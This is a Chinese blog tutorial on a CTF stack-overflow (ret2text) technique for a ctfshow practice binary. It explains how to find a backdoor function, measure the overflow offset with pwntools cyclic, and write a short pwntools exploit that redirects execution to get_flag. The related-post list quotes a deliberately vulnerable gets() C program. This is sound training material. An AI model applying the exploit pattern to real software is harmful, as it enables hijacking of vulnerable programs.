PWN 的知识之如何利用栈溢出利用后门函数

于 2025-01-05 14:49:19 发布
阅读量1.2k 收藏 10
点赞数 41
文章标签: 栈溢出 二进制安全 网络安全 逆向技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80217770/article/details/144945749
版权

PWN 的知识之如何利用栈溢出利用后门函数

利用栈溢出漏洞调用原本存在的后门函数(例如 get_flagsystem("/bin/sh"))是二进制漏洞利用中的一种常见技术,相信各位网安的师傅或多或少都听说过,那么如何利用栈溢出来利用后门函数呢?

1.原理

栈溢出(栈溢出详解)是指当程序向栈中写入数据时,超出了分配的缓冲区大小,覆盖了栈上的其他数据(如返回地址)。通过精心构造输入数据,可以覆盖返回地址,使程序跳转到我们指定的函数(如后门函数)。栈溢出的核心思想是通过覆盖返回地址,控制程序执行流。

2.寻找后门函数

后门函数通常是开发者为了方便调试或测试而留下的函数,例如:

  • get_flag:直接输出flag。
  • system("/bin/sh"):提供一个shell。
  • 其他自定义函数。

寻找后门函数的方法有很多,可以通过以下方法找到后门函数:

  • 静态分析:使用工具(如 IDA ProGhidra)反编译二进制文件,查找可疑函数。
  • 动态分析:使用 gdb 调试程序,观察函数调用。
  • 符号表:使用 objdumpreadelf 查看二进制文件的符号表:
objdump -t 文件名 | grep ****

3.确定溢出点

溢出点是指输入数据覆盖返回地址的位置。通过精确控制输入数据的长度,可以覆盖返回地址,从而控制程序执行流。

原理:原理简单来说就是通过发送特定长度的数据来观察程序的行为比如崩溃,从而来找到返回地址的精确位置。

在函数调用的时候,栈的结构通常如下:

|-------------------|
|   局部变量        	|  <- 缓冲区(可能溢出)
|-------------------|
|   保存的寄存器    	|
|-------------------|
|   返回地址        	|  <- 覆盖目标
|-------------------|
|   函数参数        	|
|-------------------|

局部变量是函数中定义的变量,通常也是溢出发生的地方,返回地址是函数执行完毕后,程序跳转的地址。

需要确定输入数据的长度,使得刚好覆盖返回地址。主要可以通过下面几种方法来确定:

  • Fuzzing:发送不同长度的输入,观察程序崩溃时的行为。
  • Cyclic:使用 pwntoolscyclic 工具生成测试字符串:
payload = cyclic(100)
io.sendline(payload)

4.构造payload

payload的结构通常为:

[填充数据] + [后门函数地址] + [参数(可选)]
  • 填充数据:用于填充缓冲区,知道覆盖掉返回地址。
  • 后门函数地址:覆盖返回地址,使程序跳转到后门函数。
  • 参数:有的后门函数需要参数,需要在payload中构造栈帧。

这里用ctfshow上的题目来做事例,下载附件先check一下

32位,保护仅部分开启RELRO,同时注意到有可读可写可执行的段。

拖进ida32位打开查看main函数。

跟进ctfshow()函数:

使用 gets 函数从标准输入读取一行字符串,并将其存储在 s数组中。然后,返回指向s 的指针。 gets函数非常不安全,容易导致缓冲区溢出漏洞。因为它无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,sebp仅有0x28,而gets不限制输入长度。

程序中还找到了后门函数——get_flag函数:

因此我们只需要利用栈溢出漏洞覆盖返回地址,将程序的执行流程转向get_flag函数,进而获取flag。

开始写exp

from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote("ip",port)
elf = ELF('./pwn')
flag = elf.sym['get_flag']

payload = cyclic(0x28+4) + p32(flag)
io.sendline(payload)

io.interactive()

题目附件及专用虚拟机

PwnRe专业Ubuntu虚拟机

https://pan.baidu.com/s/1xzt7VRwTcjb7hYZUmXoKgw?pwd=1111 提取码: 1111

题目附件

https://pan.baidu.com/s/1FjyMceBMd7nE-yTKSI8qWw?pwd=1111 提取码: 1111

感兴趣的师傅可以试一下,最后只需要写脚本时改成本地调试即可

CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1610
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFSHOW-PWN入门-栈溢出(35-42)
2402_84585385的博客
10-09 1005
发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在栈溢出,使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出,cyclic计算栈偏移量为18。
pwn基础知识笔记
月阴荒的博客
02-20 2484
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.youkuaiyun.com/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
第一个pwn案例---栈溢出的学习
MrTreebook的博客
07-13 457
第一个pwn案例—栈溢出的学习 漏洞:利用gets()函数以回车判断输入结束,并不检查输入字符串长度的特点, 将函数返回地址改写成期望执行的函数地址 在64位条件下进行实验: 1.准备好测试的程序 #include <stdio.h> #include <string.h> void success() { puts("You have already pwned me."); } void vulnerable() { char s[12]; gets(s); puts(s); }
pwn栈溢出基础笔记
小白垃圾笔记2
03-17 824
压入栈内的数据包括调用参数,返回地址,调用函数的基地址,以及局部变量,其中调用参数以外的数据共同构成了被调用函数(callee)的状态。称之为“栈”是因为发生函数调用的时候,调用函数(caller)的状态保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。函数调用的时候,栈的变化核心任务是将调用函数(caller)的状态保存起来,同时创建被调用函数(callee)的状态。在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态,恢复寄存器的值。
[pwn入门] 1. get函数缓冲区溢出
weixin_34092370的博客
01-17 822
查看保护 寻找漏洞 ida打开elf文件: gets函数存在缓冲区溢出漏洞,我们可以通过超长的字符串来覆盖缓冲区,从而修改ROP。为了达到这个目的,我们需要首先计算,输入的&s的堆栈地址位置距离堆栈的底部ebp的位置。Ebp的下一个地址,就是记录了返回地址的位置 s距离返回地址的偏移 gdb打开,并设置断点。 $esp ...
CTF-PWN方向 栈溢出等基础知识笔记(1)
weixin_51339377的博客
09-21 442
栈顶允许插入和删除 栈底不允许进行操作 栈顶在高地址位置。EAX是RAX的一部分 可以认为是EAX即可。
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 2403
本文主要详解CTFshow中pwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
CTFshow-PWN入门-栈溢出38-40详解 持续更新
王慕杨。的博客
09-06 944
本来是不想写的,但是想想还是写一下吧,基础知识这些就先不写了,以后有时间再补上吧,比较懒前面的有时间再写吧 主要是做过了。。懒。
PWN-学习笔记
小龙在线
08-23 764
原理 危险函数gets scanf pwndbg Python2 安装 pip install pwntools apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com
pwn -----gets 漏洞的利用
qq_41071646的博客
12-29 2217
其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题  这个题 还是很简单的    先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag   在 调试下 发现了   然后...
gets会读取回车键吗_今天你pwn了吗(上)
weixin_39891317的博客
11-25 494
作者:紫色仰望合天智汇前言:"二进制太难了", 一起到 buu 开始 刷题吧。这里 仅记录 下 非高分题目的 解题思路和 知识讲解。特别是文章里的函数,我特意整理了下,还请好好学习下。test_your_nc 18.0464位的elf 程序,一运行就拿到shell了。int __cdecl main(int argc, const char **argv, const char **envp){ ...
栈攻击-gets函数
helloworlddm的博客
06-17 1896
函数条用约定(Linux) 需要注意的是,32 位和 64 位程序有以下简单的区别 x86 函数参数在函数返回地址的上方 x64 System V AMD64 ABI (Linux、FreeBSD、macOS 等采用) 中前六个整型或指针参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 寄存器中,如果还有更多的参数的话才会保存在栈上。 内存地址不能大于 0x00007FFFFFFFFFFF,6 个字节长度,否则会抛出异常。 堆栈溢出原理 栈溢出指的是程序向栈中某个变量中写入的字节数
pwn by example学习笔记(一)
沐沐的博客
05-15 1526
通过一些例子来学习pwn,这些例子来自于github上的ctf-wiki pwn部分栈溢出原理(示例:ret2text)首先,获取要pwn的程序的基本信息这个程序是Linux下32位的elf格式的可执行文件,没有开启栈(stack)保护机制,没有开启nx了解了程序的基本信息以后,就运行下程序发现只有输入和输出,而且就只有一个输入点。放到ida里面去跑一下可以看到,gets从标准输入设备读字符串函数...
2018 10 11 pwn的学习0x2 gets函数和fgets函数 ,新的参数传递方式
startr4ck
10-11 1563
还是一一样的没有binsh字符串 所以我们需要继续读取字符串到内存当中  在id中寻找函数 发现并没有我们想要的提权函数 我们可以尝试着搜索gadgets去寻找我们想要找到的 看到有汇编代码   mov dword ptr[edi],ebp 和 pop edi ebp pop edi ebp 后面就跟参数edi 放地址,ebp放数值。 就可以将ebp的数值放在edi位置上   直接利...
缓冲区溢出(栈溢出)实验 之 函数调用
大头的博客
07-26 7327
前言 之前介绍的的缓冲区溢出导致站内变量值被修改(缓冲区溢出(栈溢出)实验 之 改变栈内的变量) 本小节介绍通过缓冲区溢出调用函数,此外通过学习也对函数栈的了解有所加深,这里加上小段自己对函数栈的理解 函数栈的介绍 通过汇编介绍函数执行过程中栈的变化: EBP:栈底 存储着上一个栈的栈底EBP ESP:栈顶 存储着系统栈的栈顶(函数栈形成是保存系统栈栈顶) EIP:存储下一条将要执行...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8721
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
酒店客房管理系统-SSM.zip
最新发布
06-12
《Java毕设项目专栏》 每个资源都包含源码+数据库脚本,大部分都有多个视频介绍这个项目的功能和代码、部署教程,数据库设计、文档等等,具体的看每个资源页面最下面的资源包目录! 适合用来当Java毕设!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值